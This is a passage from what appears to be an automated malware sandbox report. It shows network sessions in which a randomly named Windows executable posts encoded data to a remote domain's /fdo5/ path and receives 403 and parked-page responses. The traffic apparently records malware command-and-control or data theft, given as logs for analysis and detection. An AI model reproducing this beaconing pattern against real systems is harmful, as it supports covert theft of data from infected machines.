72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
                                                                                              Dec 3, 2023 16:27:07.195293903 CET1340INData Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
                                                                                              Dec 3, 2023 16:27:07.195308924 CET1340INData Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
                                                                                              Dec 3, 2023 16:27:07.195322037 CET1340INData Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000
                                                                                              Dec 3, 2023 16:27:07.459630966 CET118INData Raw: 6f 3b 3c 2f 61 3e 3c 2f 70 3e 20 0a 20 20 20 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 20 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                              Data Ascii: o;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.44975737.97.254.27802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:13.130539894 CET739OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.wrautomotive.online
                                                                                              Referer: http://www.wrautomotive.online/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 67 6b 42 6e 44 7a 6a 46 41 66 71 32 4b 65 72 76 56 39 74 39 35 67 41 45 57 33 6d 77 44 7a 50 52 4d 58 37 56 51 34 65 74 6d 58 4a 5a 6d 49 75 67 35 76 61 34 56 76 6c 57 48 42 6c 47 51 38 77 42 58 6d 57 72 57 4c 39 49 6b 63 51 69 6e 46 72 66 4d 63 43 73 4a 50 55 43 64 45 66 59 33 65 6a 78 54 45 59 68 5a 55 79 71 56 4d 6e 73 42 5a 4f 73 6d 53 41 52 6c 69 58 34 56 59 59 58 5a 51 67 77 63 53 6d 33 55 45 6c 42 36 74 35 52 6e 50 6e 75 49 75 4d 71 5a 6d 49 4e 4f 69 61 52 34 70 70 64 46 45 7a 58 45 48 7a 71 4f 48 39 58 4f 53 76 7a 36 51 3d 3d
                                                                                              Data Ascii: 540H2x=gkBnDzjFAfq2KervV9t95gAEW3mwDzPRMX7VQ4etmXJZmIug5va4VvlWHBlGQ8wBXmWrWL9IkcQinFrfMcCsJPUCdEfY3ejxTEYhZUyqVMnsBZOsmSARliX4VYYXZQgwcSm3UElB6t5RnPnuIuMqZmINOiaR4ppdFEzXEHzqOH9XOSvz6Q==
                                                                                              Dec 3, 2023 16:27:13.316773891 CET242INHTTP/1.0 403 Forbidden
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.44975837.97.254.27802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:15.847098112 CET759OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.wrautomotive.online
                                                                                              Referer: http://www.wrautomotive.online/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 67 6b 42 6e 44 7a 6a 46 41 66 71 32 4b 2b 37 76 57 61 5a 39 2b 41 41 48 54 33 6d 77 4e 54 50 64 4d 58 6e 56 51 35 71 39 6c 68 52 5a 6c 70 65 67 34 75 61 34 55 76 6c 57 65 78 6c 44 4e 73 77 30 58 6d 61 6a 57 4f 46 49 6b 63 45 69 6e 48 6a 66 4d 76 71 6a 4b 2f 55 58 47 30 66 61 36 2b 6a 78 54 45 59 68 5a 55 6e 48 56 4d 2f 73 42 70 65 73 6d 77 6f 51 36 53 58 37 53 59 59 58 64 51 67 72 63 53 6d 52 55 47 42 72 36 76 42 52 6e 4e 50 75 47 63 6b 70 43 32 49 4c 51 53 62 44 2f 4c 49 76 47 6e 43 70 56 47 58 51 4e 78 49 35 47 6e 44 67 39 6c 4a 39 79 48 33 4a 6a 4f 68 48 2f 68 64 76 74 56 65 4f 64 69 6b 3d
                                                                                              Data Ascii: 540H2x=gkBnDzjFAfq2K+7vWaZ9+AAHT3mwNTPdMXnVQ5q9lhRZlpeg4ua4UvlWexlDNsw0XmajWOFIkcEinHjfMvqjK/UXG0fa6+jxTEYhZUnHVM/sBpesmwoQ6SX7SYYXdQgrcSmRUGBr6vBRnNPuGckpC2ILQSbD/LIvGnCpVGXQNxI5GnDg9lJ9yH3JjOhH/hdvtVeOdik=
                                                                                              Dec 3, 2023 16:27:16.031387091 CET242INHTTP/1.0 403 Forbidden
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.44975937.97.254.27802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:18.550590038 CET10841OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.wrautomotive.online
                                                                                              Referer: http://www.wrautomotive.online/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 67 6b 42 6e 44 7a 6a 46 41 66 71 32 4b 2b 37 76 57 61 5a 39 2b 41 41 48 54 33 6d 77 4e 54 50 64 4d 58 6e 56 51 35 71 39 6c 68 70 5a 6d 66 4b 67 34 4e 69 34 54 76 6c 57 57 52 6c 43 4e 73 77 74 58 6d 53 6e 57 50 35 69 6b 65 38 69 6f 43 76 66 4b 65 71 6a 52 76 55 58 5a 45 66 62 33 65 69 31 54 45 49 6c 5a 55 33 48 56 4d 2f 73 42 73 61 73 76 43 41 51 38 53 58 34 56 59 59 68 5a 51 68 6c 63 54 4f 76 55 47 46 52 36 65 68 52 6e 74 2f 75 4b 4a 34 70 66 6d 49 4a 52 53 61 47 2f 4c 45 30 47 6e 66 59 56 47 69 46 4e 7a 55 35 45 7a 61 4a 6e 55 74 70 76 6c 72 63 2f 4d 35 32 2f 43 30 6b 71 33 36 56 48 6b 51 48 7a 35 51 57 47 6e 55 77 51 32 46 30 61 75 64 74 6c 58 76 68 75 33 66 6e 65 7a 65 6f 58 55 4f 73 57 61 6f 73 6c 7a 4f 79 5a 32 6e 79 70 78 37 46 37 41 57 6c 5a 6f 4a 74 5a 4d 76 51 34 76 79 59 70 5a 4d 34 72 48 73 79 55 37 5a 47 53 44 37 6e 6a 42 67 34 47 67 50 4f 43 5a 66 77 4d 78 46 4e 59 6d 44 72 4b 49 31 5a 5a 4c 44 67 72 63 55 2f 4b 37 72 51 49 50 58 58 69 6e 59 4b 52 51 52 62 4c 4f 74 67 38 44 65 70 35 45 71 6c 77 73 32 37 4d 4e 38 43 67 62 52 71 31 63 62 41 35 63 41 4b 4a 4f 64 54 77 6a 4f 4d 30 66 33 76 77 36 59 67 51 4e 79 77 50 44 55 57 7a 6b 7a 75 74 34 77 44 39 75 7a 44 7a 78 6a 6a 50 44 6f 34 76 37 30 62 6d 53 76 4c 38 61 43 41 4a 59 55 49 44 6b 70 62 48 53 41 38 62 73 32 65 54 47 4d 42 75 49 48 42 50 70 2f 67 53 2f 6b 73 77 46 66 7a 56 4c 67 71 59 4f 39 46 39 35 57 69 42 74 49 76 73 48 64 46 36 4d 53 62 71 48 47 56 54 55 4f 70 57 4a 44 57 44 4a 64 46 58 62 70 62 6a 6e 6b 79 68 53 32 34 49 30 62 64 57 6c 73 71 47 63 68 43 44 32 5a 4a 2b 30 48 39 58 38 35 6d 34 76 77 36 37 71 51 68 63 6d 39 43 4a 34 6b 5a 63 54 71 33 55 55 4a 31 2b 59 58 58 59 37 33 53 67 61 4e 4a 7a 79 6a 47 36 61 68 63 35 45 69 38 6a 69 62 39 6d 64 7a 78 47 41 2f 4a 71 51 73 2f 75 62 34 63 4b 5a 61 6f 65 77 46 2f 46 49 62 41 65 74 34 63 64 50 6e 77 34 39 6c 44 6f 64 2f 49 52 55 67 4c 58 34 31 35 70 66 38 52 67 34 52 33 33 32 75 48 73 4a 49 71 31 73 6f 69 4a 69 55 2b 51 4c 66 2b 31 33 62 6a 79 56 75 71 45 62 77 70 39 65 36 72 4b 73 5a 35 78 79 38 31 76 37 39 45 47 77 36 49 4c 4b 4c 6a 61 45 70 61 41 76 6b 4a 4c 39 72 5a 7a 6a 2f 5a 58 59 47 73 59 52 71 33 42 69 4e 77 67 57 6c 38 61 49 78 6c 34 50 38 62 35 4e 53 65 41 51 59 45 39 41 42 62 47 43 6a 65 72 62 79 77 34 4c 52 54 6b 2f 49 52 44 61 50 56 43 30 43 68 6f 39 47 76 56 32 30 64 5a 6d 78 4b 4b 64 41 32 4b 45 55 47 6c 31 41 46 37 67 6e 56 52 69 47 50 45 42 2f 72 52 51 4a 50 35 77 33 61 66 78 53 30 4c 2b 4e 7a 2f 63 37 6e 4b 65 6b 55 2b 5a 46 42 68 50 43 65 4c 53 33 6e 4c 56 43 47 6d 38 42 42 44 45 44 34 2f 4d 7a 46 7a 74 70 33 58 5a 6e 67 58 56 74 61 61 49 35 6c 41 34 45 44 71 63 72 64 4c 6c 53 59 35 78 45 42 57 69 53 74 46 5a 5a 5a 4a 36 2f 6a 56 74 71 61 50 31 4f 47 59 34 4c 74 46 38 30 39 79 6b 79 34 4a 54 64 44 2b 51 62 51 71 34 79 70 51 4d 61 6a 4f 50 4a 47 54 42 51 74 74 63 55 4c 31 74 79 41 51 36 47 42 76 7a 45 50 59 67 7a 46 53 66 76 47 48 41 36 4b 56 50 75 79 69 4c 63 43 49 6d 63 67 4e 6b 64 71 2f 37 42 32 76 30 34 46 74 6a 31 2b 2f 4b 50 52 42 69 31 4e 4a 4f 5a 38 63 54 61 30 51 75 6b 33 67 32 31 4a 2b 59 35 41 64 58 49 67 59 50 31 32 57 74 70 36 36 4b 55 71 52 53 70 78 53 45 45 62 54 71 46 59 51 6b 70 53 4e 72 31 6c 6b 64 4d 34 75 76 72 42 75 6c 4b 78 35 44 53 38 42 66 41 79 58 57 57 59 70 30 50 76 31 4a 56 71 4c 53 48 6e 36 56 6a 68 49 76 36 6d 78 48 56 75 4b 48 68 43 45 37 4b 77 64 68 30 50 4d 70 42 34 6a 74 4b 33 47 4e 65 56 44 32 66 54 55 76 78 4d 6c 31 4d 68 51 75 6a 4d 6e 2f 35 31 4d 58 33 55 4c 30 55 75 47 66 58 2f 4e 49 39 79 2f 39 6e 6a 43 61 51 5a 36 6e 6a 61 6a 6e 36 39 69 2b 36 78 50 46 45 49 44 45 31 4e 77 65 61 33 56 4c 41 30 4c 2b 4b 4b 67 53 32 6b 61 71 4c 69 67 4f 69 6f 46 6b 59 73 77 63 34 64 72 46 59 6c 45 72 39 41 6c 4d 44 50 78 68 4d 35 2b 6d 4c 52 39 67 59 4e 50 76 37 4a 54 72 79 4c 6d 7a 48 4a 52 42 47 37 62 42 57 39 58 58 74 36 56 51 6e 71 73 59 73 4f 6d 6b 79 62 65 62 4f 41 4e 64 32 52 33 74 57 50 63 57 62 52 46 42 66 6c 6e 45 69 54 37 35 74 6e 73 42 65 45 51 37 6b 71 66 42 52 73 75 30 7a 4d 46 2b 50 32 6a 6b 38 39 4a 35 36 31 39 72 37 78
                                                                                              Data Ascii: 540H2x=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
                                                                                              Dec 3, 2023 16:27:18.737098932 CET242INHTTP/1.0 403 Forbidden
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.44976037.97.254.27802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:21.256906033 CET466OUTGET /fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:27:21.443629026 CET1340INHTTP/1.1 200 OK
                                                                                              Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                                              Server: Apache
                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Type: text/html
                                                                                              Cache-Control: max-age=31536000
                                                                                              X-Varnish: 634803469 3
                                                                                              Age: 6471070
                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 64668
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 